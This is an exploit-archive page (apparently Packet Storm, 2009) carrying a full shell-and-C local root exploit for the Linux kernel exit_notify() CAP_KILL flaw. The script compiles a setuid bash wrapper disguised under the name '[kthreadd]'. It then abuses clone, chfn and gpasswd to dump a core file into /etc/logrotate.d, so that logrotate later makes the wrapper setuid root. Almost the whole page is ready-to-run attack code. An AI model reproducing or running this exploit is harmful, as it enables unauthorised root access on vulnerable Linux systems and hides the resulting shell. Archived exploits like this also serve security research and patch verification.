Lucene search

K
packetstormGat3wayPACKETSTORM:76444
HistoryApr 08, 2009 - 12:00 a.m.

Linux Kernel exit_notify() Local Root

2009-04-0800:00:00
gat3way
packetstormsecurity.com
30

0.0004 Low

EPSS

Percentile

0.4%

`#!/bin/sh  
  
###################################################################################  
# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit   
#   
# by Milen Rangelov (gat3way-at-gat3way-dot-eu)  
#  
# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov.  
# Basically it allows us to send arbitrary signals to a privileged (suidroot)  
# parent process. Due to a bad check, the child process with appropriate exit signal  
# already set can first execute a suidroot binary then exit() and thus bypass  
# in-kernel privilege checks. We use chfn and gpasswd for that purpose.  
#  
# !!!!!!!!!!!  
# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0   
# so you'll be out of luck most of the time.   
# So it is not going to be the script kiddies' new killer shit :-)  
# !!!!!!!!!!!  
#  
# if you invent a better way to escalate privileges by sending arbitrary signals to   
# the parent process, please mail me :) That was the best I could think of today :-(  
#  
# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness  
#  
# Skuchna rabota...  
#  
####################################################################################  
  
  
  
  
SUIDDUMP=`cat /proc/sys/fs/suid_dumpable`  
if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi  
if [ -d /etc/logrotate.d ]; then  
echo "logrotate installed, that's good!"  
else  
echo "No logrotate installed, sorry!";exit  
fi  
  
echo -e "Compiling the bash setuid() wrapper..."  
cat >> /tmp/.m.c << EOF  
#include <unistd.h>  
#include <sys/types.h>  
  
int main()  
{  
setuid(0);  
execl("/bin/bash","[kthreadd]",NULL);  
}  
EOF  
  
cc /tmp/.m.c -o /tmp/.m  
rm /tmp/.m.c  
  
echo -e "Compiling the exploit code..."  
  
cat >> /tmp/exploit.c << EOF  
#include <stdio.h>  
#include <sched.h>  
#include <signal.h>  
#include <stdlib.h>  
#include <unistd.h>  
  
int child(void *data)  
{  
sleep(2);  
printf("I'm gonna kill the suidroot father without having root rights :D\n");  
execl("/usr/bin/gpasswd","%s",NULL);  
exit(0);  
}  
  
int main()  
{  
int stacksize = 4*getpagesize();  
void *stack, *stacktop;  
stack = malloc(stacksize);  
stacktop = stack + stacksize;  
chdir("/etc/logrotate.d");  
int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);  
if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);  
}  
EOF  
  
cc /tmp/exploit.c -o /tmp/.ex  
rm /tmp/exploit.c  
  
echo -e "Setting coredump limits and running the exploit...\n"  
ulimit -c 10000  
touch /tmp/.a  
`/tmp/.ex >/dev/null 2>/dev/null`  
sleep 5  
rm /tmp/.ex  
  
if [ -e /etc/logrotate.d/core ]; then  
echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n"  
echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root"  
echo -e "\nYour terminal is most probably screwed now, sorry for that..."  
exit  
fi  
  
echo "The system is not vulnerable, sorry :("  
  
`